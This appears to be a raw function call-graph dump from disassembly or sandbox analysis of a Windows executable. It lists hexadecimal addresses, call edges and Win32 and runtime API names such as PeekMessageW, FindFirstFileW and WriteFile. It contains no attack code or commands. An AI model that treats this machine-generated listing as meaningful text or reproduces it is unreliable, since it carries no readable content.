101062 519d3c 100972->101062 100976 519d3c 60 API calls 100974->100976 100977 530db6 Mailbox 59 API calls 100975->100977 100978 52f95a 100976->100978 100977->100978 100978->100959 101077 518180 100979->101077 100981 51fd3d 100982 55472d 100981->100982 101045 5206f6 100981->101045 101082 51f234 100981->101082 101213 579e4a 89 API calls 4 library calls 100982->101213 100986 554742 100987 55488d 100987->100986 100991 51fe4c 100987->100991 101219 58a2d9 85 API calls Mailbox 100987->101219 100988 51fe3e 100988->100987 100988->100991 101217 5666ec 59 API calls 2 library calls 100988->101217 100989 554b53 100989->100986 101238 579e4a 89 API calls 4 library calls 100989->101238 100990 520517 100998 530db6 Mailbox 59 API calls 100990->100998 100991->100989 101000 5548f9 100991->101000 101086 51837c 100991->101086 100992 5547d7 100992->100986 101215 579e4a 89 API calls 4 library calls 100992->101215 100995 530db6 59 API calls Mailbox 101021 51fdd3 100995->101021 101010 520545 _memmove 100998->101010 100999 554848 101218 5660ef 59 API calls 2 library calls 100999->101218 101005 554917 101000->101005 101221 5185c0 101000->101221 101003 554755 101003->100992 101214 51f6a3 331 API calls 101003->101214 101013 554928 101005->101013 101014 5185c0 59 API calls 101005->101014 101006 51fea4 101015 554ad6 101006->101015 101016 51ff32 101006->101016 101035 520179 Mailbox _memmove 101006->101035 101007 55486b 101011 519ea0 331 API calls 101007->101011 101008 5548b2 Mailbox 101008->100991 101220 5666ec 59 API calls 2 library calls 101008->101220 101017 530db6 Mailbox 59 API calls 101010->101017 101011->100987 101013->101035 101229 5660ab 59 API calls Mailbox 101013->101229 101014->101013 101237 579ae7 60 API calls 101015->101237 101020 530db6 Mailbox 59 API calls 101016->101020 101025 520106 _memmove 101017->101025 101023 51ff39 101020->101023 101021->100986 101021->100988 101021->100990 101021->100995 101021->101003 101021->101010 101032 55480c 101021->101032 101183 519ea0 101021->101183 101023->101045 101093 5209d0 101023->101093 101025->101035 101058 520162 101025->101058 101207 519c90 101025->101207 101026 519ea0 331 API calls 101028 554a87 101026->101028 101028->100986 101232 5184c0 101028->101232 101030 51ffb2 101030->101010 101038 51ffe6 101030->101038 101030->101045 101216 579e4a 89 API calls 4 library calls 101032->101216 101037 554ab2 101035->101037 101040 519d3c 60 API calls 101035->101040 101044 520398 101035->101044 101035->101045 101049 530db6 59 API calls Mailbox 101035->101049 101052 554a1c 101035->101052 101057 554a4d 101035->101057 101181 518740 68 API calls __cinit 101035->101181 101182 518660 68 API calls 101035->101182 101230 575937 68 API calls 101035->101230 101231 5189b3 69 API calls Mailbox 101035->101231 101236 579e4a 89 API calls 4 library calls 101037->101236 101041 518047 59 API calls 101038->101041 101043 520007 101038->101043 101040->101035 101041->101043 101043->101045 101046 554b24 101043->101046 101048 52004c 101043->101048 101044->100969 101212 579e4a 89 API calls 4 library calls 101045->101212 101047 519d3c 60 API calls 101046->101047 101047->100989 101048->100989 101048->101045 101050 5200d8 101048->101050 101049->101035 101051 519d3c 60 API calls 101050->101051 101053 5200eb 101051->101053 101054 530db6 Mailbox 59 API calls 101052->101054 101053->101045 101170 5182df 101053->101170 101054->101057 101057->101026 101058->100969 101059->100963 101060->100969 101061->100969 101063 519d4a 101062->101063 101073 519d78 Mailbox 101062->101073 101064 519d9d 101063->101064 101067 519d50 Mailbox 101063->101067 101066 518047 59 API calls 101064->101066 101065 519d64 101068 519dcc 101065->101068 101069 519d6f 101065->101069 101065->101073 101066->101073 101067->101065 101070 54fa0f 101067->101070 101068->101073 101075 518cd4 59 API calls Mailbox 101068->101075 101072 54f9e6 VariantClear 101069->101072 101069->101073 101070->101073 101076 566e8f 59 API calls 101070->101076 101072->101073 101073->100978 101075->101073 101076->101073 101078 51818f 101077->101078 101081 5181aa 101077->101081 101079 517e4f 59 API calls 101078->101079 101080 518197 CharUpperBuffW 101079->101080 101080->101081 101081->100981 101083 51f251 101082->101083 101084 51f272 101083->101084 101239 579e4a 89 API calls 4 library calls 101083->101239 101084->101021 101087 54edbd 101086->101087 101088 51838d 101086->101088 101089 530db6 Mailbox 59 API calls 101088->101089 101091 518394 101089->101091 101090 5183b5 101090->101000 101090->101006 101091->101090 101240 518634 59 API calls Mailbox 101091->101240 101094 554cc3 101093->101094 101108 5209f5 101093->101108 101300 579e4a 89 API calls 4 library calls 101094->101300 101096 520cfa 101096->101030 101098 520ee4 101098->101096 101100 520ef1 101098->101100 101298 521093 331 API calls Mailbox 101100->101298 101101 520a4b PeekMessageW 101168 520a05 Mailbox 101101->101168 101103 520ef8 LockWindowUpdate DestroyWindow GetMessageW 101103->101096 101106 520f2a 101103->101106 101105 554e81 Sleep 101105->101168 101109 555c58 TranslateMessage DispatchMessageW GetMessageW 101106->101109 101107 520ce4 101107->101096 101297 521070 10 API calls Mailbox 101107->101297 101108->101168 101301 519e5d 60 API calls 101108->101301 101302 566349 331 API calls 101108->101302 101109->101109 101111 555c88 101109->101111 101111->101096 101112 520e43 PeekMessageW 101112->101168 101113 520ea5 TranslateMessage DispatchMessageW 101113->101112 101114 554d50 TranslateAcceleratorW 101114->101112 101114->101168 101115 520d13 timeGetTime 101115->101168 101116 55581f WaitForSingleObject 101118 55583c GetExitCodeProcess CloseHandle 101116->101118 101116->101168 101151 520f95 101118->101151 101119 520e5f Sleep 101153 520e70 Mailbox 101119->101153 101120 518047 59 API calls 101120->101168 101122 530db6 59 API calls Mailbox 101122->101168 101123 555af8 Sleep 101123->101153 101125 53049f timeGetTime 101125->101153 101127 520f4e timeGetTime 101299 519e5d 60 API calls 101127->101299 101131 555b8f GetExitCodeProcess 101136 555ba5 WaitForSingleObject 101131->101136 101137 555bbb CloseHandle 101131->101137 101134 595f25 110 API calls 101134->101153 101135 51b7dd 109 API calls 101135->101153 101136->101137 101136->101168 101137->101153 101138 519e5d 60 API calls 101138->101168 101139 555874 101139->101151 101140 555c17 Sleep 101140->101168 101141 555078 Sleep 101141->101168 101148 51fce0 304 API calls 101148->101168 101151->101030 101153->101125 101153->101131 101153->101134 101153->101135 101153->101139 101153->101140 101153->101141 101153->101151 101153->101168 101326 517667 101153->101326 101331 572408 60 API calls 101153->101331 101332 519e5d 60 API calls 101153->101332 101333 517de1 101153->101333 101337 5189b3 69 API calls Mailbox 101153->101337 101338 51b73c 331 API calls 101153->101338 101339 5664da 60 API calls 101153->101339 101340 575244 QueryPerformanceCounter QueryPerformanceFrequency Sleep QueryPerformanceCounter Sleep 101153->101340 101341 573c55 66 API calls Mailbox 101153->101341 101154 579e4a 89 API calls 101154->101168 101156 5184c0 69 API calls 101156->101168 101157 5189b3 69 API calls 101157->101168 101158 519c90 59 API calls Mailbox 101158->101168 101159 519ea0 304 API calls 101159->101168 101160 56617e 59 API calls Mailbox 101160->101168 101161 5182df 59 API calls 101161->101168 101162 517de1 59 API calls 101162->101168 101163 5555d5 VariantClear 101163->101168 101164 566e8f 59 API calls 101164->101168 101165 55566b VariantClear 101165->101168 101166 518cd4 59 API calls Mailbox 101166->101168 101167 555419 VariantClear 101167->101168 101168->101101 101168->101105 101168->101107 101168->101112 101168->101113 101168->101114 101168->101115 101168->101116 101168->101119 101168->101120 101168->101122 101168->101123 101168->101127 101168->101138 101168->101148 101168->101151 101168->101153 101168->101154 101168->101156 101168->101157 101168->101158 101168->101159 101168->101160 101168->101161 101168->101162 101168->101163 101168->101164 101168->101165 101168->101166 101168->101167 101169 51b73c 304 API calls 101168->101169 101241 51e6a0 101168->101241 101272 51f460 101168->101272 101291 5131ce 101168->101291 101296 51e420 331 API calls 101168->101296 101303 596018 59 API calls 101168->101303 101304 579a15 59 API calls Mailbox 101168->101304 101305 56d4f2 59 API calls 101168->101305 101306 519837 101168->101306 101324 5660ef 59 API calls 2 library calls 101168->101324 101325 518401 59 API calls 101168->101325 101169->101168 101171 54eda1 101170->101171 101174 5182f2 101170->101174 101172 54edb1 101171->101172 102363 5661a4 59 API calls 101171->102363 101175 51831c 101174->101175 101176 5185c0 59 API calls 101174->101176 101180 518339 Mailbox 101174->101180 101177 518322 101175->101177 101178 5185c0 59 API calls 101175->101178 101176->101175 101179 519c90 Mailbox 59 API calls 101177->101179 101177->101180 101178->101177 101179->101180 101180->101025 101181->101035 101182->101035 101184 519ebf 101183->101184 101202 519eed Mailbox 101183->101202 101185 530db6 Mailbox 59 API calls 101184->101185 101185->101202 101186 51b475 101187 518047 59 API calls 101186->101187 101196 51a057 101187->101196 101188 51b47a 101190 5509e5 101188->101190 101191 550055 101188->101191 101189 530db6 59 API calls Mailbox 101189->101202 102384 579e4a 89 API calls 4 library calls 101190->102384 102381 579e4a 89 API calls 4 library calls 101191->102381 101192 517667 59 API calls 101192->101202 101196->101021 101197 550064 101197->101021 101198 532d40 67 API calls __cinit 101198->101202 101201 518047 59 API calls 101201->101202 101202->101186 101202->101188 101202->101189 101202->101191 101202->101192 101202->101196 101202->101198 101202->101201 101203 566e8f 59 API calls 101202->101203 101204 5509d6 101202->101204 101206 51a55a 101202->101206 102364 51b900 101202->102364 102380 51c8c0 331 API calls 2 library calls 101202->102380 101203->101202 102383 579e4a 89 API calls 4 library calls 101204->102383 102382 579e4a 89 API calls 4 library calls 101206->102382 101209 519c9b 101207->101209 101208 519cd2 101208->101025 101209->101208 102390 518cd4 59 API calls Mailbox 101209->102390 101211 519cfd 101211->101025 101212->100982 101213->100986 101214->100992 101215->100986 101216->100986 101217->100999 101218->101007 101219->101008 101220->101008 101222 5185f6 101221->101222 101223 5185ce 101221->101223 101222->101005 101224 5185dc 101223->101224 101225 5185c0 59 API calls 101223->101225 101226 5185e2 101224->101226 101227 5185c0 59 API calls 101224->101227 101225->101224 101226->101222 101228 519c90 Mailbox 59 API calls 101226->101228 101227->101226 101228->101222 101229->101035 101230->101035 101231->101035 101233 5184cb 101232->101233 101235 5184f2 101233->101235 102391 5189b3 69 API calls Mailbox 101233->102391 101235->101037 101236->100986 101237->101038 101238->100986 101239->101084 101240->101090 101242 51e6d5 101241->101242 101243 553aa9 101242->101243 101246 51e73f 101242->101246 101250 51e799 101242->101250 101244 519ea0 331 API calls 101243->101244 101245 553abe 101244->101245 101271 51e970 Mailbox 101245->101271 101343 579e4a 89 API calls 4 library calls 101245->101343 101249 517667 59 API calls 101246->101249 101246->101250 101247 517667 59 API calls 101247->101250 101251 553b04 101249->101251 101250->101247 101252 532d40 __cinit 67 API calls 101250->101252 101254 553b26 101250->101254 101256 51e95a 101250->101256 101250->101271 101344 532d40 101251->101344 101252->101250 101254->101168 101255 5184c0 69 API calls 101255->101271 101256->101271 101347 579e4a 89 API calls 4 library calls 101256->101347 101257 579e4a 89 API calls 101257->101271 101259 518d40 59 API calls 101259->101271 101260 519c90 Mailbox 59 API calls 101260->101271 101262 519ea0 331 API calls 101262->101271 101267 51f195 101351 579e4a 89 API calls 4 library calls 101267->101351 101269 553e25 101269->101168 101270 51ea78 101270->101168 101271->101255 101271->101257 101271->101259 101271->101260 101271->101262 101271->101267 101271->101270 101342 517f77 59 API calls 2 library calls 101271->101342 101348 566e8f 59 API calls 101271->101348 101349 58c5c3 331 API calls 101271->101349 101350 58b53c 331 API calls Mailbox 101271->101350 101352 5893c6 331 API calls Mailbox 101271->101352 101273 51f650 101272->101273 101274 51f4ba 101272->101274 101275 517de1 59 API calls 101273->101275 101276 51f4c6 101274->101276 101277 55441e 101274->101277 101283 51f58c Mailbox 101275->101283 101529 51f290 331 API calls 2 library calls 101276->101529 101530 58bc6b 101277->101530 101280 55442c 101284 51f630 101280->101284 101570 579e4a 89 API calls 4 library calls 101280->101570 101282 51f4fd 101282->101280 101282->101283 101282->101284 101431 573c37 101283->101431 101434 514e4a 101283->101434 101440 58445a 101283->101440 101449 57cb7a 101283->101449 101284->101168 101285 519c90 Mailbox 59 API calls 101286 51f5e3 101285->101286 101286->101284 101286->101285 101292 513212 101291->101292 101294 5131e0 101291->101294 101292->101168 101293 513205 IsDialogMessageW 101293->101292 101293->101294 101294->101292 101294->101293 101295 54cf32 GetClassLongW 101294->101295 101295->101293 101295->101294 101296->101168 101297->101098 101298->101103 101299->101168 101300->101108 101301->101108 101302->101108 101303->101168 101304->101168 101305->101168 101307 519851 101306->101307 101316 51984b 101306->101316 101308 54f5d3 __i64tow 101307->101308 101309 519857 __itow 101307->101309 101310 519899 101307->101310 101314 54f4da 101307->101314 101312 530db6 Mailbox 59 API calls 101309->101312 102361 533698 83 API calls 3 library calls 101310->102361 101315 519871 101312->101315 101317 530db6 Mailbox 59 API calls 101314->101317 101322 54f552 Mailbox _wcscpy 101314->101322 101315->101316 101318 517de1 59 API calls 101315->101318 101316->101168 101319 54f51f 101317->101319 101318->101316 101320 530db6 Mailbox 59 API calls 101319->101320 101321 54f545 101320->101321 101321->101322 101323 517de1 59 API calls 101321->101323 102362 533698 83 API calls 3 library calls 101322->102362 101323->101322 101324->101168 101325->101168 101327 530db6 Mailbox 59 API calls 101326->101327 101328 517688 101327->101328 101329 530db6 Mailbox 59 API calls 101328->101329 101330 517696 101329->101330 101330->101153 101331->101153 101332->101153 101334 517df0 __NMSG_WRITE _memmove 101333->101334 101335 530db6 Mailbox 59 API calls 101334->101335 101336 517e2e 101335->101336 101336->101153 101337->101153 101338->101153 101339->101153 101340->101153 101341->101153 101342->101271 101343->101271 101353 532c44 101344->101353 101346 532d4b 101346->101250 101347->101271 101348->101271 101349->101271 101350->101271 101351->101269 101352->101271 101354 532c50 __alloc_osfhnd 101353->101354 101361 533217 101354->101361 101360 532c77 __alloc_osfhnd 101360->101346 101378 539c0b 101361->101378 101363 532c59 101364 532c88 DecodePointer DecodePointer 101363->101364 101365 532c65 101364->101365 101366 532cb5 101364->101366 101375 532c82 101365->101375 101366->101365 101424 5387a4 59 API calls __mbschr_l 101366->101424 101368 532cc7 101369 532d18 EncodePointer EncodePointer 101368->101369 101370 532cec 101368->101370 101425 538864 61 API calls 2 library calls 101368->101425 101369->101365 101370->101365 101373 532d06 EncodePointer 101370->101373 101426 538864 61 API calls 2 library calls 101370->101426 101373->101369 101374 532d00 101374->101365 101374->101373 101427 533220 101375->101427 101379 539c2f EnterCriticalSection 101378->101379 101380 539c1c 101378->101380 101379->101363 101385 539c93 101380->101385 101382 539c22 101382->101379 101409 5330b5 58 API calls 3 library calls 101382->101409 101386 539c9f __alloc_osfhnd 101385->101386 101387 539cc0 101386->101387 101388 539ca8 101386->101388 101396 539ce1 __alloc_osfhnd 101387->101396 101413 53881d 58 API calls 2 library calls 101387->101413 101410 53a16b 58 API calls __NMSG_WRITE 101388->101410 101391 539cad 101411 53a1c8 58 API calls 6 library calls 101391->101411 101392 539cd5 101394 539ceb 101392->101394 101395 539cdc 101392->101395 101400 539c0b __lock 58 API calls 101394->101400 101414 538b28 58 API calls __getptd_noexit 101395->101414 101396->101382 101397 539cb4 101412 53309f GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 101397->101412 101402 539cf2 101400->101402 101403 539d17 101402->101403 101404 539cff 101402->101404 101416 532d55 101403->101416 101415 539e2b InitializeCriticalSectionAndSpinCount 101404->101415 101407 539d0b 101422 539d33 LeaveCriticalSection _doexit 101407->101422 101410->101391 101411->101397 101413->101392 101414->101396 101415->101407 101417 532d5e RtlFreeHeap 101416->101417 101421 532d87 __dosmaperr 101416->101421 101418 532d73 101417->101418 101417->101421 101423 538b28 58 API calls __getptd_noexit 101418->101423 101420 532d79 GetLastError 101420->101421 101421->101407 101422->101396 101423->101420 101424->101368 101425->101370 101426->101374 101430 539d75 LeaveCriticalSection 101427->101430 101429 532c87 101429->101360 101430->101429 101571 57445a GetFileAttributesW 101431->101571 101435 514e54 101434->101435 101436 514e5b 101434->101436 101575 5353a6 101435->101575 101438 514e7b FreeLibrary 101436->101438 101439 514e6a 101436->101439 101438->101439 101439->101286 101441 519837 84 API calls 101440->101441 101442 584494 101441->101442 101845 516240 101442->101845 101444 5844a4 101445 519ea0 331 API calls 101444->101445 101446 5844c9 101444->101446 101445->101446 101448 5844cd 101446->101448 101870 519a98 59 API calls Mailbox 101446->101870 101448->101286 101450 517667 59 API calls 101449->101450 101451 57cbaf 101450->101451 101452 517667 59 API calls 101451->101452 101453 57cbb8 101452->101453 101454 57cbcc 101453->101454 102072 519b3c 59 API calls 101453->102072 101456 519837 84 API calls 101454->101456 101457 57cbe9 101456->101457 101458 57cc0b 101457->101458 101459 57ccea 101457->101459 101464 57cd1a Mailbox 101457->101464 101460 519837 84 API calls 101458->101460 101885 514ddd 101459->101885 101463 57cc17 101460->101463 101465 518047 59 API calls 101463->101465 101464->101286 101468 57cc23 101465->101468 101466 514ddd 136 API calls 101469 57cd16 101466->101469 101467 517667 59 API calls 101470 57cd4b 101467->101470 101472 57cc37 101468->101472 101473 57cc69 101468->101473 101469->101464 101469->101467 101471 517667 59 API calls 101470->101471 101474 57cd54 101471->101474 101475 518047 59 API calls 101472->101475 101476 519837 84 API calls 101473->101476 101477 517667 59 API calls 101474->101477 101478 57cc47 101475->101478 101479 57cc76 101476->101479 101480 57cd5d 101477->101480 101482 517cab 59 API calls 101478->101482 101483 518047 59 API calls 101479->101483 101481 517667 59 API calls 101480->101481 101484 57cd66 101481->101484 101485 57cc51 101482->101485 101486 57cc82 101483->101486 101488 519837 84 API calls 101484->101488 101489 519837 84 API calls 101485->101489 102073 574a31 GetFileAttributesW 101486->102073 101491 57cd73 101488->101491 101492 57cc5d 101489->101492 101490 57cc8b 101493 57cc9e 101490->101493 101496 5179f2 59 API calls 101490->101496 101909 51459b 101491->101909 101495 517b2e 59 API calls 101492->101495 101498 519837 84 API calls 101493->101498 101504 57cca4 101493->101504 101495->101473 101496->101493 101497 57cd8e 101960 5179f2 101497->101960 101500 57cccb 101498->101500 102074 5737ef 75 API calls Mailbox 101500->102074 101503 57cdd1 101505 518047 59 API calls 101503->101505 101504->101464 101507 57cddf 101505->101507 101506 5179f2 59 API calls 101508 57cdae 101506->101508 101509 517b2e 59 API calls 101507->101509 101508->101503 101511 517bcc 59 API calls 101508->101511 101510 57cded 101509->101510 101512 517b2e 59 API calls 101510->101512 101513 57cdc3 101511->101513 101514 57cdfb 101512->101514 101515 517bcc 59 API calls 101513->101515 101516 517b2e 59 API calls 101514->101516 101515->101503 101517 57ce09 101516->101517 101518 519837 84 API calls 101517->101518 101519 57ce15 101518->101519 101963 574071 101519->101963 101521 57ce26 101522 573c37 3 API calls 101521->101522 101523 57ce30 101522->101523 101524 519837 84 API calls 101523->101524 101527 57ce61 101523->101527 101525 57ce4e 101524->101525 102017 579155 101525->102017 101528 514e4a 84 API calls 101527->101528 101528->101464 101529->101282 101531 58bcb0 101530->101531 101532 58bc96 101530->101532 102354 58a213 59 API calls Mailbox 101531->102354 102353 579e4a 89 API calls 4 library calls 101532->102353 101535 58bcbb 101536 519ea0 330 API calls 101535->101536 101537 58bd1c 101536->101537 101538 58bdae 101537->101538 101541 58bd5d 101537->101541 101563 58bca8 Mailbox 101537->101563 101539 58be04 101538->101539 101540 58bdb4 101538->101540 101542 519837 84 API calls 101539->101542 101539->101563 102356 57791a 59 API calls 101540->102356 102355 5772df 59 API calls Mailbox 101541->102355 101544 58be16 101542->101544 101547 517e4f 59 API calls 101544->101547 101545 58bdd7 102357 515d41 59 API calls Mailbox 101545->102357 101548 58be3a CharUpperBuffW 101547->101548 101553 58be54 101548->101553 101550 58bd8d 101552 51f460 330 API calls 101550->101552 101551 58bddf Mailbox 101556 51fce0 330 API calls 101551->101556 101552->101563 101554 58be5b 101553->101554 101555 58bea7 101553->101555 102358 5772df 59 API calls Mailbox 101554->102358 101557 519837 84 API calls 101555->101557 101556->101563 101558 58beaf 101557->101558 102359 519e5d 60 API calls 101558->102359 101561 58be89 101562 51f460 330 API calls 101561->101562 101562->101563 101563->101280 101564 58beb9 101564->101563 101565 519837 84 API calls 101564->101565 101566 58bed4 101565->101566 102360 515d41 59 API calls Mailbox 101566->102360 101568 58bee4 101569 51fce0 330 API calls 101568->101569 101569->101563 101570->101284 101572 573c3e 101571->101572 101573 574475 FindFirstFileW 101571->101573 101572->101286 101573->101572 101574 57448a FindClose 101573->101574 101574->101572 101576 5353b2 __alloc_osfhnd 101575->101576 101577 5353c6 101576->101577 101578 5353de 101576->101578 101610 538b28 58 API calls __getptd_noexit 101577->101610 101584 5353d6 __alloc_osfhnd 101578->101584 101588 536c11 101578->101588 101581 5353cb 101611 538db6 9 API calls __mbschr_l 101581->101611 101584->101436 101589 536c43 EnterCriticalSection 101588->101589 101590 536c21 101588->101590 101592 5353f0 101589->101592 101590->101589 101591 536c29 101590->101591 101593 539c0b __lock 58 API calls 101591->101593 101594 53533a 101592->101594 101593->101592 101595 535349 101594->101595 101596 53535d 101594->101596 101656 538b28 58 API calls __getptd_noexit 101595->101656 101598 535359 101596->101598 101613 534a3d 101596->101613 101612 535415 LeaveCriticalSection LeaveCriticalSection __wfsopen 101598->101612 101600 53534e 101657 538db6 9 API calls __mbschr_l 101600->101657 101606 535377 101630 540a02 101606->101630 101608 53537d 101608->101598 101609 532d55 _free 58 API calls 101608->101609 101609->101598 101610->101581 101611->101584 101612->101584 101614 534a50 101613->101614 101615 534a74 101613->101615 101614->101615 101616 5346e6 __fflush_nolock 58 API calls 101614->101616 101619 540b77 101615->101619 101617 534a6d 101616->101617 101658 53d886 101617->101658 101620 535371 101619->101620 101621 540b84 101619->101621 101623 5346e6 101620->101623 101621->101620 101622 532d55 _free 58 API calls 101621->101622 101622->101620 101624 5346f0 101623->101624 101625 534705 101623->101625 101800 538b28 58 API calls __getptd_noexit 101624->101800 101625->101606 101627 5346f5 101801 538db6 9 API calls __mbschr_l 101627->101801 101629 534700 101629->101606 101631 540a0e __alloc_osfhnd 101630->101631 101632 540a32 101631->101632 101633 540a1b 101631->101633 101635 540abd 101632->101635 101638 540a42 101632->101638 101817 538af4 58 API calls __getptd_noexit 101633->101817 101822 538af4 58 API calls __getptd_noexit 101635->101822 101637 540a20 101818 538b28 58 API calls __getptd_noexit 101637->101818 101639 540a60 101638->101639 101640 540a6a 101638->101640 101819 538af4 58 API calls __getptd_noexit 101639->101819 101644 53d206 ___lock_fhandle 59 API calls 101640->101644 101641 540a65 101823 538b28 58 API calls __getptd_noexit 101641->101823 101647 540a70 101644->101647 101645 540a27 __alloc_osfhnd 101645->101608 101649 540a83 101647->101649 101650 540a8e 101647->101650 101648 540ac9 101824 538db6 9 API calls __mbschr_l 101648->101824 101802 540add 101649->101802 101820 538b28 58 API calls __getptd_noexit 101650->101820 101654 540a89 101821 540ab5 LeaveCriticalSection __unlock_fhandle 101654->101821 101656->101600 101657->101598 101659 53d892 __alloc_osfhnd 101658->101659 101660 53d8b6 101659->101660 101661 53d89f 101659->101661 101663 53d955 101660->101663 101666 53d8ca 101660->101666 101759 538af4 58 API calls __getptd_noexit 101661->101759 101765 538af4 58 API calls __getptd_noexit 101663->101765 101665 53d8a4 101760 538b28 58 API calls __getptd_noexit 101665->101760 101669 53d8f2 101666->101669 101670 53d8e8 101666->101670 101667 53d8ed 101766 538b28 58 API calls __getptd_noexit 101667->101766 101686 53d206 101669->101686 101761 538af4 58 API calls __getptd_noexit 101670->101761 101674 53d8f8 101676 53d90b 101674->101676 101677 53d91e 101674->101677 101675 53d961 101767 538db6 9 API calls __mbschr_l 101675->101767 101695 53d975 101676->101695 101762 538b28 58 API calls __getptd_noexit 101677->101762 101681 53d8ab __alloc_osfhnd 101681->101615 101682 53d917 101764 53d94d LeaveCriticalSection __unlock_fhandle 101682->101764 101683 53d923 101763 538af4 58 API calls __getptd_noexit 101683->101763 101687 53d212 __alloc_osfhnd 101686->101687 101688 53d261 EnterCriticalSection 101687->101688 101689 539c0b __lock 58 API calls 101687->101689 101690 53d287 __alloc_osfhnd 101688->101690 101691 53d237 101689->101691 101690->101674 101694 53d24f 101691->101694 101768 539e2b InitializeCriticalSectionAndSpinCount 101691->101768 101769 53d28b LeaveCriticalSection _doexit 101694->101769 101696 53d982 __write_nolock 101695->101696 101697 53d9c1 101696->101697 101698 53d9e0 101696->101698 101729 53d9b6 101696->101729 101779 538af4 58 API calls __getptd_noexit 101697->101779 101701 53da38 101698->101701 101702 53da1c 101698->101702 101707 53da51 101701->101707 101785 5418c1 60 API calls 3 library calls 101701->101785 101782 538af4 58 API calls __getptd_noexit 101702->101782 101703 53e1d6 101703->101682 101704 53d9c6 101780 538b28 58 API calls __getptd_noexit 101704->101780 101770 545c6b 101707->101770 101708 53da21 101783 538b28 58 API calls __getptd_noexit 101708->101783 101709 53d9cd 101781 538db6 9 API calls __mbschr_l 101709->101781 101714 53da5f 101716 53ddb8 101714->101716 101786 5399ac 58 API calls 2 library calls 101714->101786 101715 53da28 101784 538db6 9 API calls __mbschr_l 101715->101784 101717 53ddd6 101716->101717 101718 53e14b WriteFile 101716->101718 101721 53defa 101717->101721 101727 53ddec 101717->101727 101722 53ddab GetLastError 101718->101722 101731 53dd78 101718->101731 101733 53dfef 101721->101733 101735 53df05 101721->101735 101722->101731 101723 53da8b GetConsoleMode 101723->101716 101725 53daca 101723->101725 101724 53e184 101724->101729 101791 538b28 58 API calls __getptd_noexit 101724->101791 101725->101716 101726 53dada GetConsoleCP 101725->101726 101726->101724 101745 53db09 101726->101745 101727->101724 101728 53de5b WriteFile 101727->101728 101728->101722 101734 53de98 101728->101734 101793 53c5f6 101729->101793 101731->101724 101731->101729 101732 53ded8 101731->101732 101737 53dee3 101732->101737 101738 53e17b 101732->101738 101733->101724 101739 53e064 WideCharToMultiByte 101733->101739 101734->101727 101754 53debc 101734->101754 101735->101724 101740 53df6a WriteFile 101735->101740 101736 53e1b2 101792 538af4 58 API calls __getptd_noexit 101736->101792 101788 538b28 58 API calls __getptd_noexit 101737->101788 101790 538b07 58 API calls 3 library calls 101738->101790 101739->101722 101752 53e0ab 101739->101752 101740->101722 101744 53dfb9 101740->101744 101744->101731 101744->101735 101744->101754 101745->101731 101751 5462ba 60 API calls __write_nolock 101745->101751 101755 53dbf2 WideCharToMultiByte 101745->101755 101758 53dc5f 101745->101758 101787 5335f5 58 API calls __isleadbyte_l 101745->101787 101746 53dee8 101789 538af4 58 API calls __getptd_noexit 101746->101789 101747 53e0b3 WriteFile 101750 53e106 GetLastError 101747->101750 101747->101752 101750->101752 101751->101745 101752->101731 101752->101733 101752->101747 101752->101754 101753 547a5e WriteConsoleW CreateFileW __putwch_nolock 101753->101758 101754->101731 101755->101731 101756 53dc2d WriteFile 101755->101756 101756->101722 101756->101758 101757 53dc87 WriteFile 101757->101722 101757->101758 101758->101722 101758->101731 101758->101745 101758->101753 101758->101757 101759->101665 101760->101681 101761->101667 101762->101683 101763->101682 101764->101681 101765->101667 101766->101675 101767->101681 101768->101694 101769->101688 101771 545c76 101770->101771 101772 545c83 101770->101772 101773 538b28 __mbschr_l 58 API calls 101771->101773 101775 545c8f 101772->101775 101776 538b28 __mbschr_l 58 API calls 101772->101776 101774 545c7b 101773->101774 101774->101714 101775->101714 101777 545cb0 101776->101777 101778 538db6 __mbschr_l 9 API calls 101777->101778 101778->101774 101779->101704 101780->101709 101781->101729 101782->101708 101783->101715 101784->101729 101785->101707 101786->101723 101787->101745 101788->101746 101789->101729 101790->101729 101791->101736 101792->101729 101794 53c600 IsProcessorFeaturePresent 101793->101794 101795 53c5fe 101793->101795 101797 54590a 101794->101797 101795->101703 101798 5458b9 ___raise_securityfailure 5 API calls 101797->101798 101799 5459ed 101798->101799 101799->101703 101800->101627 101801->101629 101825 53d4c3 101802->101825 101804 540b41 101838 53d43d 59 API calls 2 library calls 101804->101838 101806 540aeb 101806->101804 101808 53d4c3 __close_nolock 58 API calls 101806->101808 101816 540b1f 101806->101816 101807 540b49 101810 540b6b 101807->101810 101839 538b07 58 API calls 3 library calls 101807->101839 101811 540b16 101808->101811 101809 53d4c3 __close_nolock 58 API calls 101812 540b2b CloseHandle 101809->101812 101810->101654 101814 53d4c3 __close_nolock 58 API calls 101811->101814 101812->101804 101815 540b37 GetLastError 101812->101815 101814->101816 101815->101804 101816->101804 101816->101809 101817->101637 101818->101645 101819->101641 101820->101654 101821->101645 101822->101641 101823->101648 101824->101645 101826 53d4ce 101825->101826 101827 53d4e3 101825->101827 101840 538af4 58 API calls __getptd_noexit 101826->101840 101831 53d508 101827->101831 101842 538af4 58 API calls __getptd_noexit 101827->101842 101830 53d4d3 101841 538b28 58 API calls __getptd_noexit 101830->101841 101831->101806 101832 53d512 101843 538b28 58 API calls __getptd_noexit 101832->101843 101835 53d4db 101835->101806 101836 53d51a 101844 538db6 9 API calls __mbschr_l 101836->101844 101838->101807 101839->101810 101840->101830 101841->101835 101842->101832 101843->101836 101844->101835 101846 517a16 59 API calls 101845->101846 101864 516265 101846->101864 101847 51646a 101873 51750f 101847->101873 101849 516484 Mailbox 101849->101444 101852 51750f 59 API calls 101852->101864 101853 54dff6 101883 56f8aa 91 API calls 4 library calls 101853->101883 101854 517d8c 59 API calls 101854->101864 101858 54e004 101859 51750f 59 API calls 101858->101859 101860 54e01a 101859->101860 101860->101849 101861 516799 _memmove 101884 56f8aa 91 API calls 4 library calls 101861->101884 101862 54df92 101863 518029 59 API calls 101862->101863 101865 54df9d 101863->101865 101864->101847 101864->101852 101864->101853 101864->101854 101864->101861 101864->101862 101867 517e4f 59 API calls 101864->101867 101871 515f6c 60 API calls 101864->101871 101872 515d41 59 API calls Mailbox 101864->101872 101881 515e72 60 API calls 101864->101881 101882 517924 59 API calls 2 library calls 101864->101882 101869 530db6 Mailbox 59 API calls 101865->101869 101868 51643b CharUpperBuffW 101867->101868 101868->101864 101869->101861 101870->101448 101871->101864 101872->101864 101874 5175af 101873->101874 101879 517522 _memmove 101873->101879 101876 530db6 Mailbox 59 API calls 101874->101876 101875 530db6 Mailbox 59 API calls 101877 517529 101875->101877 101876->101879 101878 530db6 Mailbox 59 API calls 101877->101878 101880 517552 101877->101880 